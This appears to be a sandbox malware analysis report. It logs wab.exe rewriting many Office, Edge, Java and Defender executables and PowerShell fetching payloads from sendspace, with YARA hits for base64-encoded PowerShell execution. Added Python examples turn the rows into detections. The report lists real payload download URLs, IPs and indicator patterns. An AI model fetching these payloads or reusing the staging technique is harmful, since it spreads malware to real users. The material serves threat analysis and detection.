              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exeJump to behavior
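Every row above has the same writer: wab.exe, a Windows Mail binary that has no reason to touch Edge, Office, Java, Google Update or the Defender platform directory, rewrites well over a hundred PE files under Program Files and ProgramData. As an added example that is not part of the report, the Python below turns rows in this export format into a detection: it groups file writes by source process, keeps only PE files under protected roots, drops installer-like writers, alerts when one process rewrites many binaries, and separately lists hits on security tooling such as MsMpEng.exe. The installer allowlist, the PE suffix set and the last two sample rows (a benign installer write and a non-PE write) are constructed assumptions; the other sample rows are copied from the table above in the flattened form the export produces, and the parser also accepts rows with a separator between the cells.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# One "System file written" row as the sandbox export prints it. The export fuses the
# table cells, so the regex keys on the cell labels; an optional " | " between cells
# and a trailing "Jump to behavior" link label are both tolerated.
ROW_RE = re.compile(
    r"^Source:\s*(?P<src>.+?)\s*\|?\s*System file written:\s*"
    r"(?P<dst>.+?)(?:\s*\|?\s*Jump to behavior)?\s*$"
)

PE_SUFFIXES = {".exe", ".dll", ".sys", ".scr", ".ocx", ".cpl"}
# Roots where an ordinary user-mode process has no business rewriting PE files.
PROTECTED_ROOTS = (
    "c:\\program files\\", "c:\\program files (x86)\\", "c:\\programdata\\", "c:\\windows\\",
)
# Illustrative allowlist (an assumption, not from the report): servicing components
# that legitimately rewrite binaries under those roots.
INSTALLER_LIKE = {"msiexec.exe", "trustedinstaller.exe", "tiworker.exe"}


def parse_row(row):
    """Return (source_process, written_path), or None if the row is not a file write."""
    m = ROW_RE.match(row.strip())
    return (m["src"], m["dst"]) if m else None


def is_protected_pe(path):
    p = PureWindowsPath(path)
    return p.suffix.lower() in PE_SUFFIXES and str(p).lower().startswith(PROTECTED_ROOTS)


def mass_pe_write_alerts(rows, threshold=5):
    """Map each non-installer process to the distinct protected PE files it wrote,
    keeping only processes with at least `threshold` distinct targets."""
    targets = defaultdict(set)
    for row in rows:
        parsed = parse_row(row)
        if parsed and is_protected_pe(parsed[1]):
            targets[parsed[0]].add(parsed[1])
    return {
        src: sorted(paths)
        for src, paths in targets.items()
        if PureWindowsPath(src).name.lower() not in INSTALLER_LIKE and len(paths) >= threshold
    }


def security_tool_targets(alerts):
    """Subset of alerted writes landing on Windows Defender platform binaries: an
    overwritten MsMpEng.exe or MpCmdRun.exe is a stronger signal than an icon stub."""
    return {
        src: [p for p in paths if "\\windows defender\\" in p.lower()]
        for src, paths in alerts.items()
    }


# Sample rows: the first seven are copied from the report (flattened export form);
# the last two are constructed to show a benign installer write and a non-PE write.
SAMPLE_ROWS = [
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to behavior",
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exeJump to behavior",
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exeJump to behavior",
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exeJump to behavior",
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEJump to behavior",
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to behavior",
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior",
    r"Source: C:\Windows\System32\msiexec.exe | System file written: C:\Program Files (x86)\Example Vendor\example.exe",
    r"Source: C:\Windows\System32\notepad.exe | System file written: C:\ProgramData\Example Vendor\notes.txt",
]

if __name__ == "__main__":
    alerts = mass_pe_write_alerts(SAMPLE_ROWS)
    for src, paths in alerts.items():
        print(f"{src} rewrote {len(paths)} PE files under protected roots")
        for p in security_tool_targets(alerts)[src]:
            print("  security tooling hit:", p)
```

On a live host the same grouping can be fed from Sysmon event ID 11 (FileCreate) records, with Image as the source and TargetFilename as the written path; the threshold of five is a starting point to tune, and a hit in Defender's Platform directory deserves escalation regardless of count. Checking the Authenticode signatures of the surviving files afterwards separates binaries that were actually replaced from ones that were merely opened for write.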
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: Joe Sandbox View | IP Address: 69.31.136.17
Source: Joe Sandbox View | IP Address: 104.21.28.80
Source: Joe Sandbox View | IP Address: 69.31.136.57
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: GET /pro/dl/i41a76 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: www.sendspace.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /dlpro/81d69660376a5bce96e9e379357cd531/664f8719/i41a76/Semicylinder.psm HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: fs03n4.sendspace.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /pro/dl/12acii HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: www.sendspace.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /dlpro/a249fc130e1351275114f8d6a64c794e/664f873c/12acii/aLnQbzJIDX45.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Cache-Control: no-cache | Host: fs13n1.sendspace.com | Connection: Keep-Alive | Cookie: SID=3n1k50ohec2v6n8nvd1o04nn84
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (three occurrences)
Source: global traffic | DNS traffic detected: DNS query: www.sendspace.com
Source: global traffic | DNS traffic detected: DNS query: fs03n4.sendspace.com
Source: global traffic | DNS traffic detected: DNS query: fs13n1.sendspace.com
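The network rows above record two two-step downloads from sendspace: a share page (/pro/dl/<id>) followed by the file itself from a storage node (fs03n4, fs13n1), with a Firefox User-Agent. As an added example that is not part of the report, the Python below parses rows in this flattened export format (the export drops the CRLF between headers, so header boundaries are recovered from the header names), extracts hosts, URLs and file names as indicators, and flags what a responder would act on: downloads from a file-sharing host, a browser User-Agent sent by a script host, and tokenised download URLs that should be matched by host and path shape rather than verbatim. The file-sharing watch list, the script-host set and the browser UA tokens are constructed assumptions; passing powershell.exe as the initiating process rests on the memory-string rows further down, which show the same sendspace URLs inside powershell.exe's memory.

```python
import re

REQUEST_LINE_RE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<path>\S+)\s+HTTP/(?P<version>1\.[01])")
# The export drops the CRLF between headers, so boundaries are recovered from the header
# names. A value that itself contains "Host:" or "Cookie:" would be split wrongly; that is
# the price of parsing this flattened form rather than a pcap.
HEADER_RE = re.compile(
    r"(?P<name>User-Agent|Host|Connection|Cache-Control|Cookie|Referer"
    r"|Accept(?:-[A-Za-z]+)?|Content-(?:Type|Length)):\s*"
)
# Constructed watch list (an assumption): public file-sharing services used for staging.
FILE_SHARING_DOMAINS = ("sendspace.com",)
BROWSER_UA_TOKENS = ("Firefox/", "Chrome/", "Safari/")
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Path shape seen above: 32-hex token, 8-hex field, share id, file name.
TOKENISED_PATH_RE = re.compile(r"^/dlpro/[0-9a-f]{32}/[0-9a-f]{8}/[^/]+/[^/]+$")


def parse_request(row):
    """Parse one 'HTTP traffic detected' row into method, path, headers, host, url, filename.
    Accepts the fused export form and the same row with ' | ' between cells."""
    text = row.split("HTTP traffic detected:", 1)[-1].strip(" |")
    m = REQUEST_LINE_RE.match(text)
    if not m:
        raise ValueError(f"not an HTTP request row: {row[:60]!r}")
    rest = text[m.end():]
    headers = {}
    marks = list(HEADER_RE.finditer(rest))
    for i, h in enumerate(marks):
        end = marks[i + 1].start() if i + 1 < len(marks) else len(rest)
        headers[h["name"]] = rest[h.end():end].strip().strip("|").strip()
    host = headers.get("Host", "")
    path = m["path"]
    return {
        "method": m["method"],
        "path": path,
        "headers": headers,
        "host": host,
        "url": f"http://{host}{path}",
        "filename": path.rsplit("/", 1)[-1],
    }


def extract_iocs(requests):
    """Deduplicated, sorted indicators from parsed requests."""
    return {
        "hosts": sorted({r["host"] for r in requests if r["host"]}),
        "urls": sorted({r["url"] for r in requests}),
        "filenames": sorted({r["filename"] for r in requests if "." in r["filename"]}),
        "user_agents": sorted({r["headers"].get("User-Agent", "") for r in requests}),
    }


def _is_file_sharing(host):
    return any(host == d or host.endswith("." + d) for d in FILE_SHARING_DOMAINS)


def flag_suspicious(requests, initiating_process=None):
    """Return (url, reason) pairs. initiating_process is the image name that issued the
    traffic when that is known from process evidence (it is not in the traffic rows)."""
    findings = []
    proc = (initiating_process or "").lower()
    for r in requests:
        ua = r["headers"].get("User-Agent", "")
        if _is_file_sharing(r["host"]):
            findings.append((r["url"], "download from file-sharing host"))
        if proc in SCRIPT_HOSTS and any(t in ua for t in BROWSER_UA_TOKENS):
            findings.append((r["url"], f"browser User-Agent sent by {proc}"))
        if TOKENISED_PATH_RE.match(r["path"]):
            findings.append((r["url"], "tokenised download URL: match on host and path shape, not the full URL"))
    return findings


# The four traffic rows copied from the report in the flattened export form.
SAMPLE_ROWS = [
    "Source: global trafficHTTP traffic detected: GET /pro/dl/i41a76 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive",
    "Source: global trafficHTTP traffic detected: GET /dlpro/81d69660376a5bce96e9e379357cd531/664f8719/i41a76/Semicylinder.psm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs03n4.sendspace.comConnection: Keep-Alive",
    "Source: global trafficHTTP traffic detected: GET /pro/dl/12acii HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache",
    "Source: global trafficHTTP traffic detected: GET /dlpro/a249fc130e1351275114f8d6a64c794e/664f873c/12acii/aLnQbzJIDX45.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs13n1.sendspace.comConnection: Keep-AliveCookie: SID=3n1k50ohec2v6n8nvd1o04nn84",
]

if __name__ == "__main__":
    reqs = [parse_request(r) for r in SAMPLE_ROWS]
    print(extract_iocs(reqs))
    for url, reason in flag_suspicious(reqs, initiating_process="powershell.exe"):
        print(f"{reason}: {url}")
```

The share ids (i41a76, 12acii) and the storage hosts are the durable indicators; the long hex token and the 8-hex field in the /dlpro/ path change per download, so a rule keyed on the full URL will never fire again. The User-Agent check only works with process attribution, which is why it takes the initiating process as an explicit input rather than guessing it from the traffic.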
Source: OfficeScrSanBroker.exe.9.dr | String found in binary or memory: http://SoftwareMicrosoft16.0CommonDebugHKEY_LOCAL_MACHINEHKEY_CURRENT_USER
Source: jucheck.exe.9.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: jucheck.exe.9.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: jucheck.exe.9.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: jucheck.exe.9.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: jucheck.exe.9.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: jucheck.exe.9.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: jucheck.exe.9.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: jucheck.exe.9.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: jucheck.exe.9.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: jucheck.exe.9.dr | String found in binary or memory: http://es5.github.io/#x15.4.4.21
Source: powershell.exe, 00000002.00000002.2504527085.000002505A59A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fs03n4.sendspace.com
Source: jucheck.exe.9.dr | String found in binary or memory: http://java.sun.com
Source: jucheck.exe.9.dr | String found in binary or memory: http://java.sun.comnot
Source: wab.exe, 00000009.00000002.2799289733.0000000022290000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2581460938.000002506881F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2407208321.0000000006097000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: jucheck.exe.9.dr | String found in binary or memory: http://ocsp.digicert.com0
Source: jucheck.exe.9.dr | String found in binary or memory: http://ocsp.digicert.com0A
Source: jucheck.exe.9.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: jucheck.exe.9.dr | String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000006.00000002.2403153242.000000000518C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: officeappguardwin32.exe.9.dr | String found in binary or memory: http://schemas.datacontract.org/2004/07/Microsoft.Office.Web.Roaming.Service
Source: officeappguardwin32.exe.9.dr | String found in binary or memory: http://schemas.datacontract.org/2004/07/Microsoft.Office.Web.Roaming.SoapObjects
Source: officeappguardwin32.exe.9.dr | String found in binary or memory: http://schemas.datacontract.org/2004/07/Microsoft.Office.Web.Roaming.SoapObjectsItemsSortKeyArrayOfR
Source: powershell.exe, 00000002.00000002.2504527085.00000250587B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2403153242.0000000005031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: jucheck.exe.9.dr | String found in binary or memory: http://stackoverflow.com/a/1465386/4224163
Source: jucheck.exe.9.dr | String found in binary or memory: http://stackoverflow.com/a/15123777)
Source: jucheck.exe.9.dr | String found in binary or memory: http://stackoverflow.com/questions/1026069/capitalize-the-first-letter-of-string-in-javascript
Source: jucheck.exe.9.dr | String found in binary or memory: http://stackoverflow.com/questions/1068834/object-comparison-in-javascript
Source: officeappguardwin32.exe.9.dr | String found in binary or memory: http://tempuri.org/
Source: officeappguardwin32.exe.9.dr | String found in binary or memory: http://tempuri.org/IRoamingSettingsService/DisableUser
Source: officeappguardwin32.exe.9.dr | String found in binary or memory: http://tempuri.org/IRoamingSettingsService/DisableUserResponse
Source: officeappguardwin32.exe.9.dr | String found in binary or memory: http://tempuri.org/IRoamingSettingsService/EnableUser
Source: officeappguardwin32.exe.9.dr | String found in binary or memory: http://tempuri.org/IRoamingSettingsService/EnableUserResponse
Source: officeappguardwin32.exe.9.dr | String found in binary or memory: http://tempuri.org/IRoamingSettingsService/GetConfig
Source: officeappguardwin32.exe.9.dr | String found in binary or memory: http://tempuri.org/IRoamingSettingsService/GetConfigResponse
Source: officeappguardwin32.exe.9.dr | String found in binary or memory: http://tempuri.org/IRoamingSettingsService/ReadSettings
Source: officeappguardwin32.exe.9.dr | String found in binary or memory: http://tempuri.org/IRoamingSettingsService/ReadSettingsResponse
Source: officeappguardwin32.exe.9.dr | String found in binary or memory: http://tempuri.org/IRoamingSettingsService/WriteSettings
Source: officeappguardwin32.exe.9.dr | String found in binary or memory: http://tempuri.org/IRoamingSettingsService/WriteSettingsResponse
Source: officeappguardwin32.exe.9.dr | String found in binary or memory: http://tempuri.org/IRoamingSettingsService/WriteSettingshttp://tempuri.org/IRoamingSettingsService/R
Source: powershell.exe, 00000006.00000002.2403153242.000000000518C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: jucheck.exe.9.dr | String found in binary or memory: http://www.computerhope.com/forum/index.php?topic=76293.0
Source: jucheck.exe.9.dr | String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000002.00000002.2504527085.000002505A561000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sendspace.com
Source: jucheck.exe.9.dr | String found in binary or memory: http://www.tutorialspoint.com/javascript/array_map.htm
Source: powershell.exe, 00000002.00000002.2504527085.00000250587B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.2403153242.0000000005031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lBjq
Source: powershell.exe, 00000006.00000002.2407208321.0000000006097000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.2407208321.0000000006097000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.2407208321.0000000006097000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: jucheck.exe.9.dr | String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/Reduce
Source: jucheck.exe.9.dr | String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/filter
Source: jucheck.exe.9.dr | String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/indexOf
Source: jucheck.exe.9.dr | String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/Trim
Source: jucheck.exe.9.dr | String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/startsWith
Source: jucheck.exe.9.dr | String found in binary or memory: https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Objects/String/endsWith
Source: powershell.exe, 00000002.00000002.2504527085.000002505A586000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fs03n4.sendspaX
Source: powershell.exe, 00000002.00000002.2504527085.000002505A586000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2504527085.0000025058C43000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fs03n4.sendspace.com
Source: powershell.exe, 00000002.00000002.2504527085.0000025058C3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2504527085.000002505A582000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2504527085.000002505A561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2504527085.000002505A586000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2504527085.0000025058C43000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fs03n4.sendspace.com/dlpro/81d69660376a5bce96e9e379357cd531/664f8719/i41a76/Semicylinder.psm
              Source: wab.exe, 00000009.00000003.2365648701.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2372986169.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2787822130.00000000069E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs13n1.sendspace.com/
              Source: wab.exe, 00000009.00000003.2365648701.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2372986169.00000000069E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs13n1.sendspace.com/=6
              Source: wab.exe, 00000009.00000003.2372986169.00000000069E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs13n1.sendspace.com/Z6:
              Source: wab.exe, 00000009.00000003.2365648701.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2787822130.00000000069BD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2787822130.00000000069BA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2365503757.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2372986169.00000000069CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs13n1.sendspace.com/dlpro/a249fc130e1351275114f8d6a64c794e/664f873c/12acii/aLnQbzJIDX45.bin
              Source: powershell.exe, 00000006.00000002.2403153242.000000000518C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: notification_click_helper.exe.9.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
              Source: notification_click_helper.exe.9.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith
              Source: powershell.exe, 00000002.00000002.2504527085.0000025059A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: jucheck.exe.9.drString found in binary or memory: https://javadl-esd-secure.oracle.com/update/%s/map-%s.xml
              Source: jucheck.exe.9.drString found in binary or memory: https://javadl-esd-secure.oracle.com/update/%s/map-m-%s.xml
              Source: jucheck.exe.9.drString found in binary or memory: https://javadl-esd-secure.oracle.com/update/%s/map-m-%s.xmlhttps://javadl-esd-secure.oracle.com/upda
              Source: powershell.exe, 00000002.00000002.2581460938.000002506881F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2407208321.0000000006097000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000002.00000002.2504527085.000002505A55C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2504527085.00000250589DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com
              Source: wab.exe, 00000009.00000002.2787822130.0000000006958000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/
              Source: wab.exe, 00000009.00000002.2787822130.0000000006958000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/J
              Source: wab.exe, 00000009.00000003.2365648701.00000000069CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pr
              Source: wab.exe, 00000009.00000002.2797826895.0000000021AD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/12acii
              Source: wab.exe, 00000009.00000002.2787822130.000000000699D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/12aciiBl
              Source: wab.exe, 00000009.00000002.2787822130.000000000699D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/12aciiyl
              Source: powershell.exe, 00000002.00000002.2504527085.00000250589DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/i41a76P
              Source: powershell.exe, 00000006.00000002.2403153242.000000000518C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/i41a76XRll
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownHTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.5:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.5:49714 version: TLS 1.2
              Source: OfficeScrSanBroker.exe.9.drBinary or memory string: RegisterRawInputDevicesmemstr_5464500f-6

              System Summary

Source: amsi32_5572.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1716, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
